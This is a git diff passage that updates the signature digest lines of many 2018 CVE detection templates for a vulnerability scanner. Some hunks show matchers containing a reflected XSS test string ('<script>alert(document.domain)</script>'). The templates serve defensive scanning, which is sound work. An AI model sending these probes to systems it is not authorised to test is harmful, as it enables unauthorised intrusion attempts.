490a00463044022034a8d7ea8f0ba73a743326aa37dc3e4c090c42e8a4a51bb4847cce6c50c528d4022001045927aa51f0f0262aeccd03651a89f70b5a839861d4ba12316b7688686c01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220137e70ae738a06c5e15a6256041ec6b70c8c3e50995e8c85510b0e5f44e5b983022076858c78b61f407039a1d6f0fc5964fd997c944c9eaff7e8a98156c50008af6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18325.yaml b/http/cves/2018/CVE-2018-18325.yaml index 72bafd3446b..2f8eab088fa 100644 --- a/http/cves/2018/CVE-2018-18325.yaml +++ b/http/cves/2018/CVE-2018-18325.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100e8836049181100d2380d399bc7e6a6b82dc9190ea41748c25aa5cb48ebdbd7f302205aaee8ccad805c1b33e71fdc41c026304aa1250b33264efe05db3cc3c2244378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035ab10de1e67c381b52c6c0affed8b981010e7d0052b225878a1385a7ea5088f02200735c6900755fee2d35d6c6d3e07d3486d6ed59ae38d7e14e0049f2942df3aa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index e26ec32e822..e2237d31aa8 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e06dc6c36ed7f10cf7612ce90cd2ef8247c39d87ae169e139ef0829787786fc7022100bf26e085d282d84284b2034dc6e53e0470f711eac62808942c29eb1576c5ab46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c28312e8abbf7fda7a195aa5897d96f92fa81c444ded1a2324932a90b8d7bee302201031591614857e8170efa0bf84cbca521dcecd07130dc5a4526c3dcf67967465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 2d29bd17c66..d43c444c3a5 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f74fbcc1edc4f0cd9cfcdefef7cdff60172fab9a5375c7dbb3e95ddba48d7ffc022100869b090aa2a49431e20de53fb9de66319b2885d97a1fd386b3b7bcc0b880f10d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c164521bd8f201f14564e37cd5f26d286ce91a46583c6031c0588c873ef33f80220780cf51394161d6df8c5f70474df4d20190681b6ee4c91d783e77f4932c529e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 0e8bc0397eb..4baa0758381 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ec73eb2880be42741bbe9c25bfa078847ec92951e661f3e2ae8c1c092ac793240220404a33162a3618a605d4f6009452fd8ebcbfeea1e83c4dba98a068713013779a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ef1293987a78455f1188db16aedfbe8241f310788b6c48993544a8d01d2c84302203190afefac600fc70d2bb10c5f9dab11552086470d6adfe6115b8c20a94b045d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index e2cc8a148db..a32facf86dd 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -48,4 +48,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")' -# digest: 4a0a0047304502202232151591f3a44ac35d9865f44f7caff1eacb45dd537d3b92cc16b0bce1c847022100d1e7c7e7ba3a9cc95b4baffae40cd60467e998a586eb7c323eb40f2acd5f0c2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3385ae4a25a6f82d233fcc1392f6f9e655ec858a3a70f773cee759bd79c45da022054a8212bf52cd571a40a8a7f91cd616b68b0fa54b03c4ece60f74875f869e591:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19127.yaml b/http/cves/2018/CVE-2018-19127.yaml index 4bd3c3c4e90..d2d734062e7 100644 --- a/http/cves/2018/CVE-2018-19127.yaml +++ b/http/cves/2018/CVE-2018-19127.yaml @@ -58,4 +58,4 @@ http: - type: word words: - "{{md5(num)}}" -# digest: 4b0a00483046022100c78c32a4760c8549b7f7a37777378611ea248a591014b1c67061c150b9b42784022100bbde9249d68bfe66994e85b72afbae7de1384f6d8da3cf439682314a9f67b8bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046ceeb4c1e1e39320f258a230ce1ed55a9016d088cd121b6a00e10cd9b91e6a902210091af5e2c21ba765588a85b1979ccd542ced4715b7a278d4ccc331932fca93bd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index cfbbe5783be..65c8bdd57df 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dcf9ecd23fd7e440bdc86d499f491eb80223f55fe816b18ed1eb36b7364a038302210090bf78ba0af13f05daa5f5e7da3a51ef2220422b25396c7a679c1b9a1bea686b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091b60c009b476de5f600a90d4ad5ed716cef54956398f7e4256a142a9185fde3022100ad767ba38499e7c2a8f3cd1a772cc9c853519974ef648671165b67a6bc03a021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 2379c9c3b4a..997f63e084f 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d3576e5ad28fd8e0885ce3cbf143e1d0892aaefacfcfcdd76445e48e6d5c80f022040f4ad9204937ed0011b180334f26c8ef7c4701547412fee8c595e1f1d36bf9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf00f504244b98678d6dcaccf010403e0d0b8b83fcd70bfbb6cd057e39062fbb022004592dda07852816ab82ccb80eea562ce5ad1a6a6eed6d64e43098962a867cc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 184280c5d26..370f991b587 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022007e4ff454451432574c99b0bef11bf3ee019b73b6b1eea8d4743f78d250c83c8022077b6b3a91f854a04be3797c03441b98c55be124af5f5a9265c2a46c5bbdc6e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab200af8ce0c3e67da86ff1d9e63ddf011b96222f6296afdad64894102057d870221008d6cdad9797f4d880f324cd300bb43f950261e5587318b03acef9b6b92d41f43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 4ee0974668b..34bc3eeaa30 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204081732d6aee194a061ab8385586c93e66d37a526ecf6425ff8be18c154e092d022100df5349cedc9769b5fa44833d3a5d3c6de5484c57035e4111263e934e51cff8a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205f1cc7e8ead3703e971d4ff1be874e1703a6f38c890b486bcc3ccbd836f71a2c02201f198f163e6dfd58b19e22a5635b723f500da63c89f58011b520c32779c09ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 20f66948313..7a1f48f78f9 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b15b71f74186c90b93364b6f4e6c5334f0301a0eb643a1ab3f43f612cfb85f6e022100de3a911ffbd53bdf2efa10b3d3217f9581e0e85c0a2e370c9b5c9e7af8409e79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ed894c05b2e828f6317091a2e3db9e6ecf8cd902ad48f02a8e4cb7ec066235f02201566eaae73e2aa6ef2d0006ea7a02e87eb06db162e45003c2c51c390df631b14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 8648118a43c..624d6f3e3f8 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - "contains(body_3, '><script>alert(document.domain)</script></a>')" condition: and -# digest: 490a00463044022014c7f51cbc182922c0cc333cf1efcfcdc180501709c7de570c897e984b2a7e7b02206be434cddf2afd9730de36ae8428e6467176c70ed939274f3a772b79e570cacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe23c2cb69d6647b1feb768cd22f6a91a3ca0e9beaf563fe4f78e6e3658743c9022100f509b8b0a67b31d1437fa472038dccb8ec20d632e1fdaaedf724fd338f5a6c30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 29b76f7364b..0dbd3bfbc67 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210082494012cc2f579918e979250835263a1c941520628650bc7ee2fab22110db0302206dbb873f52f03ba5a8a3b682995e096973ae2f96dd76fd88d26af161e922a08c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032161f9047ee8e69b4b3ad739a2806991a4c3d844fb56020f6da376f1b33f12a022078316a67f71e296fe9371391ce57be0a53bd8ea987f1749aed58df5db922390c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index d6cb6a6f1ac..0dbba7ee42c 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d9d03b7f50a26e41e26573ace468dc12c604981bdd52ec2cbfea13dba24ecfb02204ba6b8e06097ead9c66d8ff6284bd26af2a8714a9c1ff8e17e2752983de8f8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210088c266bf74750767e8d3982c8152b11eac5f3135854978f678e116483431985d022100bdcc366fd60582aad36aacbacc3db9ed3ad3561a786c4b713c8d85344f3c6074:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 32dc52fcc10..851c0f6b31f 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200c3d9b82582e4ce4da3fdc33512f90d5fdcf5b9e89afa6637c4dc2fb18b38d3c02210096ee1e52fb8090a43e6c4c551cb8155613a5e9b344afdc207dd954421436f38a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039f4591621de81cf68bebdbcea4b574caafa97ae5b8bca00db0106911e1bc16d0220633b20e8dba3e7ff093c8a65a13c732210666f818ea71c9c454ae978cad061e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 9003233c7d0..c849f7b0461 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dfda5fe6786de418fc4622e1c98bac3ff245540202572dbcd196f844b4dd2e1f0220763846903e19ef84839f96dbc16ecad797aeedffc0f063af26c6986c4047b89f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098d8a0bf9bedb47144b56e90f69de85cd7d482e8edfe2a58da4e7fce9216213b022100b5c4ebfdcf93d7772d0d743699629ee3ba9f34d8494114bcf3373cd36294f3b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 6bbd2a8db09..cc57a05a086 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022062b4f8f99a41170f1d84397c89cd79e2d14cd810c8ebbd9271f6bc35c8d03991022100ba05c8f4b8571385fc065b76207e306d3124b9928e9a4bebdb2bbe53d1be7613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b3ab58b232b34e3332371b265bc0ae84ea23433f106b5a541045c94d734f2438022028374895907f645d1784d803dda7ce3c3cd841e43be07bf45db863b8ebc5438a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 214ad1074ad..4a44721da72 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, "><script>alert(document.domain)</script></a>")' condition: and -# digest: 4b0a00483046022100d031d1f5ae563115ce4485d237225f1375b07d72b572c05bd150ee95e87bb57a022100dc45af3d3777114cbfb46e060dde32c5fd20d7f154ffb95ae45854d4385e1b41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4e696335ed366d5a00561334194cc93033fc5f38d9c2d01281a383e5111c56f0220520ad9aeba7526b8229c5232b982eab0cc769d68cbfe81fe73f02975fa08e27f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 73179a56a86..321cd8f6c4c 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, "><script>alert(document.domain)</script></a>")' condition: and -# digest: 4a0a0047304502206be011443952682be9e7958e8f33b8904ea35b619318bf1d6e3494038d531aa9022100a6a8423c3a834c7bff9c7accd5e595cb59d48300daf1e7979a6500e670251688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d181a4cff3f2c5d741619656364e69cafc2612311cc4618b7fd5be21149fb12c022066cdab4f282258e204ceefc31496dcfb64a9112db91bff9e5bb7efa52ce7ebd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index b8d421a2652..777453fab5b 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, "><script>alert(document.domain)</script></a>")' condition: and -# digest: 4b0a004830460221008baa4b2a26542f962cc9d0315d8ea0fefcc92c0f439c75790378214ff99e1e8b0221008a40c7ed2e092cab18fefbeee6aab8b0f5b88fddfd5e741efdec715a97dcea4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0fd3431b08500d10e56245a14b9ac2be75a285571a164772884e41ce929a12e022036f8e686380e21e103c1d6bd0d2ae25c4626aac0804abd4adb8799e2151e5609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index f40c106a521..c099a9bc8e7 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -57,4 +57,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, "><script>alert(document.domain)</script></a>")' condition: and -# digest: 4a0a00473045022100bfab8cc62272d771c0414e4b3ffe33b2aac0de0bea2f47b935f6ed415f1b51620220526b450846f5a3591aaf83001a471c895e93a6d19dbcad6c05037a2b4a7d9a29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011879c6ae49358fec801977dd91f5f6b3b7e092a84229ac44c559ccc4f1432fe022100fba153bdba28da85e6f4860f17a2c6260c2d51469d022f4d230928ebcdc7bad0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index 6bcbe93f619..d989a7ef178 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -57,4 +57,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, "><script>alert(document.domain)</script></a>")' condition: and -# digest: 490a0046304402204118e99eac6155732281608e161f9395852a93fc5b033e6b69ea5f0074b0061a02207f477172ecde73880e1405c85e4d6e14895dab396b297325a8d71037e5262420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065422531357f107b6eb12f69b3dd51f78f014e3477c072a919b955827c57104e02201cc1e24f32f37618123db1140fb6c13298e0c8e8640d89ea7bb2c5101faf5465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index b66d0c405d6..b5548a4f6e2 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200d18abd60947d207bc50b28cd0c651bd7bfa8f5f066ebe4f8af823140faaa216022100c483282fa41a2c9c12b500f3bf8171fab4ae2b782ccf389dcbc9ca68bcd15081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220647fbe5d35962780c81557a2cf755c1aa5dd2bd7a479595beca3871a2afac3b8022041708e0e25011c1711583344a0d37e16dce69194d9c736b85105a596b44418a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index f94c628552b..1838414c90c 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d39b0810657eab84fc3743e0bfecfdd6164cb16c3c976950ec0143f9a3facf50022065c36a4d32228c3a231f20bca63ce35bfe66f70a080dd3c7f552300f8683dda8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c866d849509afc8840d939697e7a05274bd74f105019c71c189429ab586f99d0220166312684e2394ccfa07164b9796d04d974e658a1d8a5e211989447cb05d5124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 7d735e41f20..d988712aac1 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f71060a55dddcc879542264deb78f0d31517da642a0c9929948abe2a952831d4022100cca0ac4518867ce628940edbfeeccd2e9bef5b5015f78524a3bef131de08972b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9355457a705c60827810744f91b9cb867a9aba6d70271d83320aad243456bea02202f498692124db2b420fbab0751ca84d0a7551aa060d5a3a3775a0b236393bb0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 994aee6baba..28f96efd7ec 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ba018ca0ac09967cffe17b5cd0dd31625913b36f4320555380d1becbae5462b5022100f8283ae2edb1215e1e387a14bae3e04ff0a6ea617a0d7b3381cc8a8a6080741f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff1f0455f7440a16ba3d56365e662eea2ae9fb5d83f6b245dce743580adc921702206625a616b06c3eed679d3a6a08403e3444640197bc1e7a170e1ceae07dc6a83d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-25114.yaml b/http/cves/2018/CVE-2018-25114.yaml index abac25a0301..fbabdde9234 100644 --- a/http/cves/2018/CVE-2018-25114.yaml +++ b/http/cves/2018/CVE-2018-25114.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024b00a470791876c6c053e5ab54d7a7bd73ff46325f5831b41d9754ff88ba12c022100ce6af27002b62c5d205479fe1923b9c88be348c996fca832c0d894b194b1d124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a4663bcab02d1f2553a560d2588b633e861d8bf3d87bd83e3fb3c66166fbe0d0221009f8dcefcb4756e49eb9b08a832c9f40134d589c2ffa58f151cd87683267f10f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index 359b5e5a820..0303be40e49 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -52,4 +52,4 @@ http: - '<script>alert(24)</script>' - 'Missing translation key' condition: and -# digest: 4a0a0047304502206fac40b9f66e8ee7cd20fe8947a6d646a6100be8aa8cddf36c66cee649bcfa5b022100a07f7388b8d22975888a2ea2c95b8001ced0ea2fae72298b141cbbdec7a81a99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220096bb4d7e50fdece3fd6320565a37380297eb44648aad6da2a6d4a6e20461d06022100ead3bf65f06d921cd8e12088e319eda0d96138efd9c77582a77e60f09b86d406:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 458eff5f2aa..1313c6111a8 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ae79b1aa196d62b12123e52d73e0f1600e0ed2b03f5382c6f2161e80ca39c9730221008e4ff35cf9419dc53fe51cccaf4c16aae06e0dcc87089ecc3facfee38acc1b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf18026c773290b241ecb0442108ffbf2c09cc5ccb5cb418421fb45fffa65dc702200698495d63fbf07cad9ceace9cd8f2c1edbb9f7a7cdf0ebf4c9c2672c3936185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 00d0e7825d2..960be4f12a1 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -55,4 +55,4 @@ http: - '<script>alert(document.domain)</script>' - 'Variables.cs_imagedir' condition: and -# digest: 4b0a00483046022100b504fd6384a8de8a77a96ae78693018accc9dcbdb7cd179e71227eca0327924c022100dd48bc842828248b008ac0ead7dc1f1b4d7d22ffb441b333a00da72d05f96c43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220237205c5534dc36d701b2a4474aad1f5441e5c78751573414f3ae6962f63293c02200a9abff064c9ee5373d355ee23706c632616e3811ae516a0925fd2f10a6eba2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index 26e44f74368..b7c10a1a5c3 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210096e703d07c138fefbb663e3a75fc54694ae5acd3072841e3494306d65e21f8ca02201ec1a5645948c1c81f8136ac733ed254e506a1744d6cc409abfb3573ae6506e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c1c6af734342d5607be8a0bf150666a3f7b6f15be1d8f1479791d98155a70320221008dad892fb868bdfa1978736d6dac3e3e2662cf52cc8149b53133dc651e676187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index dfa85aa04cc..3fef9959361 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df9e5b99ee32d44a752cb95b5d706656c5e80c96daee4aae0c7b03d42d7e2be9022100e9a02465db28d9d6de53419fb7914cb3a060ddbffcf5c780c7d5b7bf98acb565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a09e231347ab2385207de41e04b66848b15fb6a9083e5be9d603351a83a4246b022100e70d23eb6a3712bde2d8fd0bffda4c85297844138478d4112ee50dc163f0f5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index fdc02607415..de30f1c7396 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e30ac95e501627f392be387762cfacb00b16cf91778e2c6efaf20018c8b39c002205a17ddecb679dbf139d4b4deea1ce29f8f2757e9f9c2624ca65b9f134a2a99e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054b971c463ed20bf71c94663b2bf3b585422f7d22252dabbcfd27ca2e43f785e022100be92e19b7ad25357d9c220d39327691a5f1f64e70edde4a4b3906c91dd07d769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index 3693f2ff9fe..c2c2bda974b 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f85d6f579fd850ebfc4f5a73504915df3195e78538227da6217e1fb4ca676705022100f6ed152d75f02a98dd0861ebaf0fe6cfea015aa81ab030c32690dcd0b30e3be5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d53832ebf7ac0c9227399495a6d41305e94ccd5850d42add25d7ecfa93995b302202e9e31a12eb68c34d47b417a0c6d48d5c8122a8da414208da8c0e009c74792ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index f3d5a631c61..c9d93bfa8e4 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d4682d48dbfacedf0663b91869ec749b11dc54bfc3610c39e985a12a7b1f5ec02203f726de6dee4a706f9370cc3497369289ed5f299e1be4f275feb64872d102118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039694b8a62b9feb2d5ee43d9ca67eb8d422cf197c09b49194bc288cac1998b790221008541fe7d0ea894603a1a5a8cd832b3286da5f005f1f91dd4f06433e019bb03d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index a648947b2d9..b8a32490050 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 